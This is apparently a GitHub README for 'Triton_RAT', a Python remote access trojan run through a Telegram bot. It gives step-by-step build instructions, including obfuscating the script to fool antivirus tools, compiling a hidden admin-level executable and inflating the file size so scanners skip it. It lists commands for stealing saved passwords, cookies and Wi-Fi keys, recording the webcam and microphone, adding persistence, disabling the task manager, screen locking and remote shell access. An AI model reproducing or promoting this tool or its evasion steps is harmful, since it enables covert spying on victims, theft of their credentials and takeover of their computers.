Skip to content

Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπŸ˜‰!

License

Notifications You must be signed in to change notification settings

WhiteeRabbit/Triton_RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

28 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Triton_RAT

Triton_Remote_Administration_Tool

TRITON

Hi πŸ‘‹, I'm WhiteeRabbit

I wrote RAT in python that works with telegram!

The best rat that works with telegram!

This tool was created for educational purporses only! I'm not responding for your action!

🎯 About

With this tool you can control with YOUR pc remotly using telegram That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account

Let's get started!:

Download python!

python

Bot Password (when you entering /help or /start) : acd

🏁 Starting

# Register account in telegram
# Create bot with botfather


# Download this project

$ Download pyinstaller from https://github.com/pyinstaller/pyinstaller
# because most antiviruses will detect as virus pyinstaller from original pip version
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that 

# also i'm recomending you to install and upgrade setuptools and pip
$ pip install --upgrade setuptools pip
# if you don't do this, problems may arise

# Download requiremets.txt
$ pip install -r requirements.txt

# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')

# !MAIN STEP! obfuscation will help to deceive antiviruses
$ to obfuscate that script copy full code and paste it in https://freecodingtools.org/py-obfuscator
$ https://freecodingtools.org/py-obfuscator
# Of course you can use another obfuscators but i like that obfuscator (this is not an advertisement)

# after downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import browser_cookie3 --hidden-import pyttsx3 Triton_Rat_Release.py



# wait for building exe
# !BOT PASSWORD IS: acd

$ run exe and bot started! 

If you want to avoid scanning some antiviruses you can make that⬇️

More online scanners and antiviruses also most popular online antivirus scanner virustotal's max allowed file size is 650 MB. Antiviruses, seeing the file size that it is large, will stupidly not check it! and you will be cool man.

I wrote a python app that will help you to change your file's size for ex: from 100 mb to 750 mb.

With help of this app you can make your file's size as you wanted!(it works on all systems)

23

You can use:

    βš”οΈ/start - start the program
    βš™οΈ/help - help with commands
    πŸ”Œ/addstartup - to add autostart
    πŸ§‘πŸ»β€πŸ’»/users - show users in pc
    πŸ”‘/passwords - show saved passwords in pc
    πŸͺ/robloxcookie - show roblox cookies
    πŸͺͺ/info - to show information about pc ,also location , country, city , ip
    πŸ–₯️/whoami - to show name of pc
    πŸ’¬πŸ‘‚πŸ»/textspech 'your text' - your text will sounded in pc
    🎡/playsound 'file path' -(first run /upload to upload your music file in pc) your file will sound in pc for ex: /playsound C:\test.mp3
    πŸ”«/execute - execute shell commands (like terminel emulator in netcat)
    πŸ—‘οΈ/e 'your command' - also execute shell commands
    🏹/ex 'your command' - use this if you will execute commands with long response 
    πŸ“·/screenshot - to get screenshot
    πŸ“Ή/webscreen - get screenshot from camera
    πŸŽ™οΈ/mic 'time in seconds' - record microphone of pc
    ☒️/winblocker - my own winlocker
    ☣️/winblocker2 - if winblocker doesnt work
    πŸ“/download 'your file' - to download files(for exm: /download C:\test.txt)
    πŸ—ƒοΈ/upload - to upload file in target pc
    πŸ“‹/clipboard - show users clipboard
    🎦/webcam - get webcam video
    πŸŽ₯/screenrecord - get screenrecord
    🌐/chrome 'website url' - open website in chrome in target pc
    🌐/edge 'website url' - open website in edge in target pc
    🌐/firefox 'website url' - open website in firefox in target pc             
    Ⓜ️/msg 'your message' - send message(messagebox) to target
    πŸ’£/spam 'your message' - spam your message 10 times but if you will click al lot...
    πŸ›œ/wifilist - show saved wifi
    πŸ”/wifipass 'name of accespoint' - show password of saved wifi
    πŸ–±οΈ/mousemesstart - start mouse messing
    🐁/mousemesstop - stop mouse messing
    πŸͺ€/mousekill - disable mouse
    🐭/mousestop - enable mouse
    πŸ”Š/fullvolume - make full volume
    πŸ”‰/volumeplus - make pc volume + 10
    πŸ”‡/volumeminus - make pc volume - 10
    πŸͺ¦/disabletaskmgr - disable task manager
    πŸ“ /enabletaskmgr - enable task manager
    🧱/wallpaper - change desktop's wallpaper
    ⌨️/keypress 'your key' - in pc's keyboard will pressed this keys 
    ⌨️/keypresstwo 'your key' 'your key' - in pc's keyboard will pressed this keys 
    ⌨️/keypressthree 'your key' 'your key' 'your key' - in pc's keyboard will pressed this keys 
    πŸ“ƒ/tasklist - to show tasks
    🧨/taskkill 'your task' - kill entered task
    πŸ•ΆοΈ/hide - to hide your app
    πŸ‘“/unhide - unhide your app
    πŸ’€/sleep - send windows to sleep
    πŸ•š/shutdown - shutdown pc
    πŸ”„οΈ/restart - restart pc

Antivirus check

Π‘Π½ΠΈΠΌΠΎΠΊ экрана (21)

πŸ“ License

This project is licensed under the MIT License. For more details, please refer to the LICENSE file.

About

Completely free Telegram integrated RAT, Triton_RAT is one of the best RAT's that was written in python. Good luckπŸ˜‰!

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages